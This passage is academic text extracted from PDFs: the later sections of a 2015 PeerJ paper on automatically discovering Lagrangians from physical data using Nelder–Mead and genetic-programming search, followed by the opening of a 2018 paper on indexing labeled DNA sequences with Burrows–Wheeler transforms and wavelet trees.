have removed terms with coefficients less than 10−5 and displayed the remaining Hills et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.31 7/17 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.31 Figure 2 Result of running the algorithm on simulated data from the five test systems. In each graph panel, the (blue) open circles to the left of the vertical bar are the training data. The solid (red) line, to the right of the vertical bar is the algorithm’s prediction. The (red) filled circles to the right of the bar show the actual behaviour of the system. For clarity only every third validation point is shown. The algorithm does not have access to these validation points when it is making its prediction. It can be seen that the algorithm has accurately learned the dynamics of the system in each case. coefficients to two decimal places for clarity, was L = −0.30x2 + 0.14x4 + 0.20ẋ2. This is exactly the expression, apart perhaps from overall scaling, that would be written by a human physicist. The coefficients yielded by the search are found to match the correct Hills et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.31 8/17 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.31 Figure 3 Application of the algorithm to data with simulated noise added. The graphs are in the same format as Fig. 2. We see that the algorithm is robust to noise, finding a model that accurately predicts the future evolution. coefficients to the 6th decimal place, limited by the convergence tolerance that we set. By generating a model in this form the algorithm gives insight into the system directly from the data. The case of the simple pendulum is also interesting to consider. Here the search algorithm tried three models, where the third, with m = 2 and p = 4, converged in 480 Nelder–Mead iterations. The search in this case took around 0.6 s. The generated model, multiplied by 100 to make it more readable, was L = 0.049x + 8.6x2 − 3.0ẋ2 − 0.0030xẋ2 − 0.41x2ẋ2. (4) It can be noted that this is not a straightforward Taylor expansion of the simple pendulum’s Lagrangian, and it is not obvious how to relate it to the standard form. Experimenting with removing terms and solving the resultant equations of motion indicates that the terms proportional to x and xẋ2 are unimportant, but the relatively small term in x2ẋ2 is essential. Despite being in an unexpected form, this Lagrangian does make successful predictions. We shall see in ‘Generalisation’ that it is in fact a local approximation of a true Lagrangian around the region of configuration space that the training trajectory explored. Real world measurements are inevitably noisy and so to be practically useful it is important that the algorithm is able to converge even in the presence of imperfections in the data. We took the data for our third test system—the coupled harmonic oscillators— and added normally distributed noise, with standard deviation 0.1 (about 5% of the oscillation amplitude) to the position, velocity, and acceleration. Figure 3 shows the result of running the algorithm on this noisy data set. We see that the algorithm is robust to this noise, finding a model that describes the future evolution well. Hills et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.31 9/17 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.31 Table 1 Summary of models found for each of the test systems and the computational effort required to find them. “Total iterations” gives the number of Nelder–Mead iterations used searching through all forms of the model, including the final form. “Final iterations” gives the number of Nelder–Mead itera- tions used refining the final form of the model. The “Generalised simple pendulum” will be introduced in ‘Generalisation’. System (m,p) Parameters Total iterations Final iterations Time to converge (s) Duffing oscillator (4,4) 10 5,340 2,160 4.5 Simple pendulum (2,4) 5 940 580 0.5 Coupled harmonic oscillator (2,2) 10 1,740 1,740 1.2 Double pendulum (2,4) 43 400,970 269,470 460 Penning trap (2,2) 21 5,650 5,650 6.2 Oscillator with noise (2,2) 10 1,240 1,240 0.7 Generalised simple pendulum (4,4) 10 3,270 8,450 7.1 Table 1 summarises the size of the models found and the computational effort required to find them. We have not conducted a detailed study of how this proof-of-principle algorithm scales as the problem size increases, but note that our preliminary investigations show that it scales quite poorly. We find that the primary determinant of convergence rate seems to be the number of free parameters in the model. We therefore speculate that a more sophisticated technique for varying the structure of the model might be of use in improving the performance. A particularly promising approach might be to follow (Clegg et al., 2005) and use a genetic algorithm to evolve the form of the model in combination with a continuous algorithm like Nelder–Mead to optimise the parameter values for any given model form. GENERALISATION We have shown that the algorithm can find models which successfully predict the future evolution of the system’s behaviour. However, a good physical model does not just capture the behaviour of a particular time-series, corresponding to a particular set of initial conditions. Rather, it should be able to predict the behaviour of the system over a range of initial conditions. It is perhaps this ability to generalise that sets a true physical model apart from a mere fit or interpolation of the system’s behaviour. It is interesting, therefore, to study whether the models found by our algorithm have this property. We have seen in the case of the Duffing oscillator that the discovered model is indeed the correct model, and we would expect that this model will correctly predict the dynamics of the system for any initial conditions. We test this by simulating the behaviour of the system for a wide range of initial conditions, and comparing the results to the predictions of the model. We find, as expected, that the learned model for the Duffing oscillator does make correct predictions for all initial conditions. Applying this procedure to the other test systems we find that the coupled harmonic oscillators and the Penning-type ion trap models also generalise well, making successful predictions for all initial conditions. This indicates that our algorithm is not merely a Hills et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.31 10/17 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.31 Figure 4 Predictions for different initial conditions of the learned simple pendulum model (red dashed line) compared to the true behaviour (blue solid line). The amplitude of the pendulum swing varies between panels. The model was trained at the amplitude shown in (F). We see that the model makes good predictions for the initial conditions it was trained on, but breaks down for other initial conditions. sophisticated curve fitting routine, but rather is finding the underlying physical truth behind the system dynamics to make its predictions. The pendulum and double pendulum models do not generalise well, as we might have anticipated from the form of the Lagrangian in Eq. (4). Figure 4 compares the prediction of the learned simple pendulum model against the true behaviour, for a variety of swing amplitudes. We see that while the prediction is accurate for the amplitude at which the model was trained, it deviates at other amplitudes. These results are perhaps to be expected, and could well be the same as generated by a human physicist given the same data. The algorithm has found a mathematically simple approximation that works well for the data it has available to it, but does not have enough to go on to determine the true underlying model. We consider two approaches to generating models that generalise better for these systems, inspired by the approaches a human physicist might take. The first method is simply to train the models with more data, corresponding to a wider range of initial conditions. The second is to introduce new mathematical constructs which allow a simpler model to be found, reasoning that this model is more likely to generalise well. For the first approach we follow exactly the same procedure as before except we generate a number of trajectories, corresponding to a range of initial conditions, and use a score that is the sum of the scores for the individual trajectories. We applied this procedure to the simple pendulum system. The resulting search takes approximately 15 times longer to converge than the single-trajectory search. We find that the algorithm is unable to converge on an m = 2, p = 4 model, as it did before, and has to continue its search until it finds an m = 4, p = 4 model whose predictions fit all of the trajectories adequately. Figure 5 compares the predictive ability of this model with the ‘single-trajectory’ model of the previous section. We see that, as shown in Fig. 4, the single-trajectory model makes Hills et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.31 11/17 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.31 Figure 5 Comparing a model for the simple pendulum trained on multiple trajectories with one trained on a single trajectory. The curves show the squared error between the model’s prediction and the true behaviour, as a function of the pendulum’s swing amplitude. The dashed (blue) curve shows the result for a model trained at a single swing amplitude, indicated by the heavy (blue) arrow. This model performs well at the amplitude it was trained at, but poorly at other amplitudes. The model corresponding to the solid (red) curve was trained with multiple trajectories, indicated by the other (red) arrows. The original trajectory was also included in the training set for this model. We see that the ‘multi-trajectory’ model makes better predictions across a wide range of initial conditions, including conditions that it was not trained on. The multi-trajectory model is able to make successful predictions up to surprisingly large amplitudes, well beyond those it has seen in training. good predictions for the initial condition it was trained at, but makes poor predictions for other initial conditions. The ‘multi-trajectory’ model, though, is much improved. It makes good predictions at all of the initial conditions it was trained at, and further makes good predictions at other, unseen initial conditions as well. We have found similar results for the double-pendulum system, although the computational expense of the problem constrained the experiment to a limited region of initial-condition-space. Our second approach to generalisation is to expand the representation of the Lagrangians to encompass a wider range of mathematical expressions. We reason that, with a wider palette of mathematics at its disposal, the algorithm may be able to find a model of simpler form that works well. History has shown, although this may be tautological, that often systems of interest to physicists can be described by remarkably simple mathematical models. We hope that by allowing the algorithm to generate structurally simpler models, it may be more likely to discover the underlying physical truth. We have developed a proof-of-principle implementation of a richer representation, and a corresponding search algorithm, detailed in the Appendix . Briefly, we take a genetic programming approach (Koza, 1992) and compose mathematical expressions as trees with leaf-nodes corresponding to the system variables, simple functions (sine, cosine, square) of these variables, and numerical constants. Branch-nodes of the tree are arithmetic operators +,−,×. This structure can represent a much wider range of mathematical forms than our polynomial representation. We search over this tree-structured representation using Hills et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.31 12/17 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.31 an algorithm (Zitzler, Laumanns & Thiele, 2001) that simultaneously tries to optimise the score and minimise the size of the trees. Thus, this search algorithm tries explicitly to find simple expressions that score well on the data. Repeating the search on large-amplitude (±0.95π ) simple pendulum data using the tree-based representation highlights the relative strength of this approach. The generated model, which makes a successful prediction, is L = 0.25θ̇ 2 + 2.0cos(θ ), the same as would be written by a human physicist. Naturally, this model makes correct predictions over the full range of initial conditions. There are two reasons that the tree-based expression search is able to converge on this model. First it is only because the representation of possible models is richer that this model can be directly represented at all. Second, the notion of mathematical complexity in this representation more closely models that of a human physicist. This allows the search algorithm to do more work driving the result towards an expression that we recognize as canonical. It must be cautioned, though, that this is only a proof-of-principle demonstration. To reach this result we had to bias the search algorithm, as described in the Appendix , and even then the run time is significantly longer, often taking many hours with a multi-threaded implementation on the hardware described above. We were not able to get results for the double pendulum system at all with the computing resources at our disposal. Nonetheless, we present this result as the technique shows potential for learning models that are both better able to generalise, and in a format more suitable for communication to human physicists. CONCLUSION We have demonstrated an algorithm that can predict the future dynamics of a physical system directly from observed data. We have shown that the algorithm generates models that can be communicated to a human physicist, sometimes even finding models in textbook form. We have further shown that the models generated generalise well to unseen data, and are not merely fits or interpolations, but are truly capturing the physical essence of the system under study. One might ask what the use of such an algorithm is. As a first point, we find the question of whether a computer can do science to be fascinating in itself. Investigating the limits of a computer’s ability in this regard educates us as to the strengths and weaknesses of our current scientific processes, and invites us to consider a different perspective on our scientific work. But perhaps a more practical answer is that tools such as this could assist humans in their work. We see this assistance as coming in two forms. The first is simply automating the actions of a scientist so they can be applied to more data. Techniques that can be automatically applied to datasets, scanning for scientifically interesting features—in the case of the algorithm in this paper, for example, finding that there is a least action principle at work—may come to be a fruitful approach to generating unexpected scientific leads as we head into a data-dominated era. The second is opening up the techniques of science to Hills et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.31 13/17 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.31 Figure 6 An expression tree representing θ 2 − 3cos(θ̇ ). non-specialists. By capturing the idea of searching for least action models in an algorithm we make it available to anyone, including those without the necessary skills to do it by hand. By way of analogy, it is interesting to consider popular online natural language translation software. While no-one would consider these tools suitable for translating poetry, they nonetheless are exceedingly useful to many people in the common case where a ‘good-enough’ translation will do. While we do not imagine computers will replace expert human physicists in the near term, we envisage the availability of tools to automate scientific reasoning will empower non-specialists to take better advantage of the discoveries and insights of physics. ACKNOWLEDGEMENTS We acknowledge many useful discussions with Jeremy Mabbitt, Mike Tarbutt, Jack Devlin, Iain Barr, Ben Sauer, and Ed Hinds. DJAH and AMG contributed equally to this work. APPENDIX: TREE-BASED REPRESENTATION AND SEARCH Here we describe in detail the tree-structured symbolic representation of mathematical expressions and the corresponding search routine. The expressions are built following a grammar designed to bias the search towards expressions that might be Lagrangians for simple physical systems. Each terminal of these expression trees is one of: numerical constants, randomly generated; the coordinate variables and velocities; the squares of the coordinates and velocities; and for coordinates which represent angles, the sine and cosine of the coordinates and velocities. The non-terminal nodes of the trees are the operators +,−,×. An example expression tree is shown in Fig. 6, representing the expression θ 2 − 3cos(θ̇ ). To search through these tree-structured expressions we take a genetic programming approach (Koza, 1992), explicitly optimising both the least-action score Eq. (3) and also a complexity score, using the SPEA2 multi-objective optimisation algorithm (Zitzler, Laumanns & Thiele, 2001). This biologically-inspired evolutionary algorithm maintains a population of candidate expressions and breeds, reproduces, and mutates them to try to simultaneously optimise the least-action and complexity scores. Hills et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.31 14/17 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.31 In detail, we first construct a population of randomly generated expressions, usually numbering 100. We score these expressions using the least-action score and also assign a complexity score which is simply the number of nodes in the expression tree. The SPEA2 algorithm takes the current population, and an initially empty set of elite expressions, representing the best that have been seen so far. It has a rather complex selection mechanism (Zitzler, Laumanns & Thiele, 2001) that produces a new set of elite expressions, plus a set of expressions, the breeding pool, which are candidates for reproduction. A new generation is created from the breeding pool by mutation (10%) and pair-wise crossover (90%). Mutation is effected by replacing a randomly chosen subtree of the given expression with a randomly generated subtree. The crossover operation takes two expressions, selects a random point in each of the two trees, and swaps the sub-trees at these points to generate two new expressions. The evolutionary process is repeated starting from this new generation, and we iterate for a large number of generations, typically many thousand. To improve the convergence speed of the numeric constants in the expressions we also incorporate a small amount of hill-descent into each evolutionary iteration: a subset (20%) of the expressions have their numeric constants randomly adjusted by a small amount, and if this improves their least-action score, the modification is kept. We also impose a maximum size of expression (50 nodes) and trim expressions that exceed it each generation to ensure that the run-time is bounded. The final elite set is a set of expressions that represent the trade-off between least-action score and complexity. We select from this set the simplest expression that has a least-action error below a specified threshold. In this tree-based method, the structure of the candidate Lagrangians varies during the search, so it is not possible to partially pre-calculate the score function, as it was in the restricted polynomial technique. Rather it must be calculated in full for each expression in the population. Further, the search space of possible expressions is exceedingly large, and the score is not very smooth with respect to the genetic operations. As a result, the search must run for many generations and is extremely computationally expensive. A naı̈ve implementation might calculate the partial derivative time-series in (Eq. (3)) by symbolically differentiating the candidate expression and then calculating the value of the derivative. This, however, can be exponentially expensive in the depth of the expression, in terms of both memory and runtime. A better approach, that we adopt in this work, is to simultaneously evaluate the expression’s value and its derivatives using automatic differentiation (Kalman, 2002). This method avoids calculating an expression for the derivative, and has run-time proportional to the size of the expression. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare there are no competing interests. Hills et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.31 15/17 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.31 Author Contributions • Daniel J.A. Hills and Adrian M. Grütter performed the experiments, analyzed the data, performed the computation work, reviewed drafts of the paper. • Jonathan J. Hudson conceived and designed the experiments, performed the experi- ments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: https://github.com/JonyEpsilon/flow. REFERENCES ATLAS collaboration. 2012. Observation of a new particle in the search for the Standard Model Higgs boson with the ATLAS detector at the LHC. Physics Letters B 716:1 DOI 10.1016/j.physletb.2012.08.020. Bradley E, Easley M, Stolle R. 2001. Reasoning about nonlinear system identification. Artificial Intelligence 133:139 DOI 10.1016/S0004-3702(01)00143-6. Clegg J, Dawson J, Porter S, Barley M. 2005. The use of a genetic algorithm to optimize the functional form of a multi-dimensional polynomial fit to experimental data. The 2005 IEEE congress on Evolutionary computation 1:928–934 DOI 10.1109/CEC.2005.1554782. Dzeroski S, Todorovski L. 1993. Discovering dynamics. In: Proc. tenth international conference on machine learning. San Mateo: Morgan Kaufmann Publishers Inc., 97–103. Euler L. 1744. Methodus inveniendi lineas curvas maximi minive proprietate gaudentes. In: Methodus inveniendi lineas curvas maximi minive proprietate gaudentes. Bousquet, Lausanne & Geneva. Feynman R, Leighton R, Sands M. 1963. The Feynman lectures on physics. In: The Feynman lectures on physics. 2nd edition. vol. 1. Boston: Addison-Wesley. Gao F, Han L. 2012. Implementing the Nelder-Mead simplex algorithm with adaptive parameters. Computational Optimization and Applications 51:259 DOI 10.1007/s10589-010-9329-3. Hayden EC. 2014. Is the $1,000 genome for real? Nature DOI 10.1038/nature.2014.14530. Hillar C, Sommer F. 2012. Comment on the article “Distilling free-form natural laws from experimental data”. ArXiv preprint. arXiv:1210.7273. Hudson JJ, Hills DJA, Grütter AM. Flow project code. Available at https://github.com/JonyEpsilon/ flow. Kalman D. 2002. Doubly recursive multivariate automatic differentiation. Mathematics Magazine 75:187 DOI 10.2307/3219241. Koza JR. 1992. Genetic programming: on the programming of computers by means of natural selection. Cambridge: MIT Press. Langley P. 1979. Rediscovering physics with BACON.3. In: Proceedings of the 6th international joint conference on artificial intelligence. vol. 1. San Francisco: Morgan Kaufmann Publishers Inc., 505–507 series and number IJCAI’79. Ljung L. 2010. Perspectives on system identification. Annual Reviews in Control 34(1):1–12 DOI 10.1016/j.arcontrol.2009.12.001. Hills et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.31 16/17 https://peerj.com/computer-science/ https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow http://dx.doi.org/10.1016/j.physletb.2012.08.020 http://dx.doi.org/10.1016/S0004-3702(01)00143-6 http://dx.doi.org/10.1109/CEC.2005.1554782 http://dx.doi.org/10.1007/s10589-010-9329-3 http://dx.doi.org/10.1038/nature.2014.14530 http://arxiv.org/abs/1210.7273 https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow https://github.com/JonyEpsilon/flow http://dx.doi.org/10.2307/3219241 http://dx.doi.org/10.1016/j.arcontrol.2009.12.001 http://dx.doi.org/10.7717/peerj-cs.31 Maupertuis PLM De. 1744. Accord de différentes lois de la nature qui avaient jusqu’ici paru incompatibles. Mém. As. Sc. Paris 417. Nelder JA, Mead R. 1965. A simplex method for function minimization. The Computer Journal 7(4):308–313 DOI 10.1093/comjnl/7.4.308. Newman R, Tseng J. Memo 134: cloud computing and the square kilometre array. Available at http://www.skatelescope.org/uploaded/8762 134 Memo Newman.pdf. Schmidt M, Lipson H. 2009. Distilling free-form natural laws from experimental data. Science 324(5923):81–85 DOI 10.1126/science.1165893. Schmidt M, Lipson H. 2010. Symbolic regression of implicit equations. In: Riolo R, O’Reilly U-M, McConaghy T, eds. Genetic programming theory and practice VII, genetic and evolutionary computation, Genetic and evolutionary computation. Springer, 73–85. Sjöberg J, Zhang Q, Ljung L, Benveniste A, Delyon B, Glorennec P-Y, Hjalmarsson H, Judit- sky A. 1995. Nonlinear black-box modeling in system identification: a unified overview. Trends in System Identification, Automatica 31(12):1691–1724 DOI 10.1016/0005-1098(95)00120-8. Todorovski L, Dzeroski S. 1997. Declarative bias in equation discovery. In: Proc. fourteenth international conference on machine learning. San Mateo: Morgan Kaufmann Publishers Inc., 376–384. Zitzler E, Laumanns M, Thiele L. 2002. Giannakoglou K, et al., ed. Evolutionary methods for design, Optimisation and Control with Application to Industrial Problems (EUROGEN). International Center for Numerical Methods in Engineering (CIMNE), 95–100. Hills et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.31 17/17 https://peerj.com/computer-science/ http://dx.doi.org/10.1093/comjnl/7.4.308 http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://www.skatelescope.org/uploaded/8762_134_Memo_Newman.pdf http://dx.doi.org/10.1126/science.1165893 http://dx.doi.org/10.1016/0005-1098(95)00120-8 http://dx.doi.org/10.7717/peerj-cs.31 An algorithm for discovering Lagrangians automatically from data Introduction The principle of least action The Algorithm Score function Representation and search Results Generalisation Conclusion Acknowledgements Appendix: Tree-based representation and search References work_sez4tbvmsnazjc6uvf5fqvutky ---- Indexing labeled sequences Indexing labeled sequences Tatiana Rocher, Mathieu Giraud and Mikaël Salson Université de Lille, CNRS, Centrale Lille, Inria, UMR 9189 CRIStAL, Lille, France ABSTRACT Background: Labels are a way to add some information on a text, such as functional annotations such as genes on a DNA sequences. V(D)J recombinations are DNA recombinations involving two or three short genes in lymphocytes. Sequencing this short region (500 bp or less) produces labeled sequences and brings insight in the lymphocyte repertoire for onco-hematology or immunology studies. Methods: We present two indexes for a text with non-overlapping labels. They store the text in a Burrows–Wheeler transform (BWT) and a compressed label sequence in a Wavelet Tree. The label sequence is taken in the order of the text (TL-index) or in the order of the BWT (TLBW-index). Both indexes need a space related to the entropy of the labeled text. Results: These indexes allow efficient text–label queries to count and find labeled patterns. The TLBW-index has an overhead on simple label queries but is very efficient on combined pattern–label queries. We implemented the indexes in C++ and compared them against a baseline solution on pseudo-random as well as on V(D)J labeled texts. Discussion: New indexes such as the ones we proposed improve the way we index and query labeled texts as, for instance, lymphocyte repertoire for hematological and immunological studies. Subjects Bioinformatics, Computational Biology, Algorithms and Analysis of Algorithms Keywords Data structures, Text indexing, Burrows–Wheeler transform, Wavelet Tree, V(D)J recombination INTRODUCTION Labels are a way to add some information on a text, as the semantics of words on an English sentence or functional annotations such as genes on a DNA sequences. Can we build an index that saves a labeled text like ACGCC : : : TTGA (of size 96), which have the label L1 in the positions 12–41 and the label L2 in the positions 56–96? We consider here the case where a same label can be given to different (but similar) patterns and can occur several times in the text. We introduce two indexes which store a labeled text and answers to position–label association queries. Those indexes share some ideas with the RL-FMI (Mäkinen & Navarro, 2004) which uses a Burrows–Wheeler transform (BWT) and a Wavelet Tree (WT). Using a somewhat similar organization, we index a labeled text. The following sections present the TL- and TLBW-indexes (text–label indexes) and their associated queries. The last section presents experimental results on simulated and real genomic data. Let T = t0 t1 : : : tn - 1 be a text of length n over an alphabet of size s. The text may be composed of several sequences, each sequence ending with the symbol $. Let L = {L0, L1 : : : Ll - 1} be a set of labels. A labeled text (T, A) is here a text with non-overlapping labels: a letter should have at most one label. Each position i of the text is labeled by exactly one label ai ∈ L ∪ {3}, where the special 3 label is put on every letter How to cite this article Rocher et al. (2018), Indexing labeled sequences. PeerJ Comput. Sci. 4:e148; DOI 10.7717/peerj-cs.148 Submitted 14 September 2017 Accepted 1 February 2018 Published 26 March 2018 Corresponding authors Mathieu Giraud, mathieu.giraud@univ-lille.fr Mikaël Salson, mikael.salson@univ-lille.fr Academic editor Rahul Shah Additional Information and Declarations can be found on page 12 DOI 10.7717/peerj-cs.148 Copyright 2018 Rocher et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.148 mailto:mathieu.�giraud@�univ-lille.�fr mailto:mikael.�salson@�univ-lille.�fr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.148 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ without label. A = a0 a1 : : : an - 1 is the label string. Figure 1 shows the text which will be used all over this article. Given a bit vector B = B[0]B[1] : : : B[n - 1], where each B[i] is either 0 or 1, we define as B[i, j] the vector B[i]B[i + 1] : : : B[j]. Let us call rank(b, i, B) the number of times the bit b ∈ {0, 1} appears in the prefix B[0, i] and select (b, j, B) the position i of the jth appearance of the bit b in B. Such a bit vector B can be stored in nH0(B) + o(n) bits to support rank and select in O(1), where H0(B) is the zeroth order entropy of B (Raman, Raman & Rao, 2002). The BWT (Burrows & Wheeler, 1994) is a reversible algorithm which reorganizes the letters of a text. The transformed text, BWT(T), is the concatenation of the last letters of the lexicographically sorted rotations of the text. BWT(T) is easier to compress and can be stored using nHk(T) + o(n) bits, where Hk is the kth order empirical entropy of the text T. The FM-index (Ferragina & Manzini, 2000) uses the BWT, a table C, where C[a] gives the number of letters lexicographically smaller than a, and a function Occ(a, i) giving the number of occurrences of a in BWT(T)[0, i]. The FM-index allows to efficiently search a pattern using backward search. A WT (Grossi, Gupta & Vitter, 2003) is a binary tree storing a text, where each symbol from the alphabet corresponds to a leaf. The root is a bit vector where every position corresponds to the element it has to index. Any position marked 0 (respectively 1) corresponds to an element whose leaf is on the left (respectively right) descendant of the node. The process is repeated recursively until the leaves. For a text A of length a in an alphabet of size l, the construction of a balanced WT needs O a dlog l= ffiffiffiffiffiffiffiffiffiffi log a p e � � time (Munro, Nekrich & Vitter, 2016) and requires nH0(A) + o(a log l) bits when bit vectors are zero-order compressed (Navarro & Mäkinen, 2007). The usual full-text indexes such as the FM-index (Ferragina & Manzini, 2000) or the LZ-index (Kärkkäinen & Ukkonen, 1996) do not index labeled texts. Some recent researches allow bidimensional range queries: Arroyuelo et al. (2015) represent an XML tree structure as a compressed bit vector and allow queries on structured patterns. We focus here on non-overlapping labels and look for ways to efficiently store such labels along with sequences as well as to query them. The basic idea is that consecutive labels in A are often the same: we will thus store compressed label sequences. MATERIALS AND METHODS TL-index: indexing labels over a text Given a labeled text (T, A), we define the TL-index as, using a FM-index built on a BWT U to index the 